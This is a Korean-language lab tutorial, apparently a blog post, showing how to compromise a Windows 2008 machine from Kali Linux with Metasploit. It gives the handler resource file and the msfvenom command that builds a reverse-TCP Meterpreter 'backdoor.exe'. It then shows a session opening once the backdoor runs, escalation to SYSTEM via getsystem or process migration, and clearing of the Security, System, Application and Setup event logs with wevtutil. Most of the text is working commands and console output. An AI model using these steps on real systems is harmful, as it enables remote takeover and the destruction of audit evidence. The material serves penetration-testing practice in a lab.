메타스플로잇을 이용하여 윈도우 2008 로그 삭제하기

- 사용 시스템

Window 2008

KaliLinux

- 윈도우 2008에서 로그 확인

시작 > 관리도구 > 이벤트 뷰어 > Window 로그 

- 칼리리눅스에서 연결된 세션의 윈도우2008 운영체제 사용자 권한 상승 및 로그 지우기

(Kali)

# cd /root/bin

# vi reverse_resource2.rc

use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.27.50 set ExitSession false exploit -j -z

# msfconsole -r reverse_resource2.rc 

Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit        =[ metasploit v4.14.10-dev                         ] + -- --=[ 1639 exploits - 944 auxiliary - 289 post        ] + -- --=[ 472 payloads - 40 encoders - 9 nops             ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing reverse_resource2.rc for ERB directives. resource (reverse_resource2.rc)> use exploit/multi/handler resource (reverse_resource2.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp resource (reverse_resource2.rc)> set LHOST 192.168.27.50 LHOST => 192.168.27.50 resource (reverse_resource2.rc)> set ExitSession false ExitSession => false resource (reverse_resource2.rc)> exploit -j -z [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.27.50:4444  [*] Starting the payload handler... msf exploit(handler) > sessions Active sessions =============== No active sessions. msf exploit(handler) > jobs Jobs ====   Id  Name                    Payload                              Payload opts   --  ----                    -------                              ------------   0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.27.50:4444 msf exploit(handler) >

[Terminal 2]

# cd /root/bin

# msfvenom -p windows/x64/meterpreter/reverse_tcp \

LHOST=192.168.27.50 LPORT=4444 -f exe -o backdoor.exe 

No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: backdoor.exe

# ls backdoor*

backdoor.exe

# cp backdoor.exe /share        /* 전 계시물 참고 */

(win2008)

\\192.168.27.50\share

backdoor.exe  파일 바탕화면에 복사 > 실행

(kali)

[*] Sending stage (1189423 bytes) to 192.168.27.201 [*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.201:49164) at 2017-11-10 21:29:00 +0900 msf exploit(handler) > sessions Active sessions ===============   Id  Type                     Information                      Connection   --  ----                     -----------                      ----------   1   meterpreter x64/windows  WIN2008\Administrator @ WIN2008  192.168.27.50:4444 -> 192.168.27.201:49164 (192.168.27.201) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >  meterpreter > getuid Server username: WIN2008\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 636 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. C:\Windows\system32>wevtutil.exe el wevtutil.exe el Analytic Application ....중략..... Microsoft-Windows-osk/Diagnostic Microsoft-Windows-stobject/Diagnostic Security Setup System TabletPC_InputPanel_Channel ThinPrint Diagnostics WINDOWS_MP4SDECD_CHANNEL WMPSetup WMPSyncEngine Windows PowerShell microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin C:\Windows\system32>wevtutil.exe cl "System" wevtutil.exe cl "System" C:\Windows\system32>wevtutil.exe cl "Application" wevtutil.exe cl "Application" C:\Windows\system32>wevtutil.exe cl "Security" wevtutil.exe cl "Security" C:\Windows\system32>wevtutil.exe cl "Setup" wevtutil.exe cl "Setup"

> getsystem으로 권한 상승

> wevtutil 로 로그 지우기 

[참고] wevtutil    https://technet.microsoft.com/ko-kr/library/cc722318(v=ws.11).aspx

[참고] getsystem 으로 권한이 상승되지 않을 경우

window 7/8/8.1 운영체제에 patch가 되어 있는 경우

meterpreter> shell 

Process 2928 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>wmic process list brief | find "winlogon"

HandleCount  Name              Priority  ProcessId  ThreadCount  WorkingSetSize 

116          winlogon.exe         13        488        3            8327168 

C:\Windows\system32>exit

meterpreter > migrate 488

[*] Migrating from 4056 to 488...

[*] Migration completed successfully.

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

(win 2008)

로그 확인

시작 > 제어판 > 관리도구 > 이벤트 뷰어 > Windows 로그

> 응용프로그램 이외에 보안/ Setup/ 시스템 모두 지워짐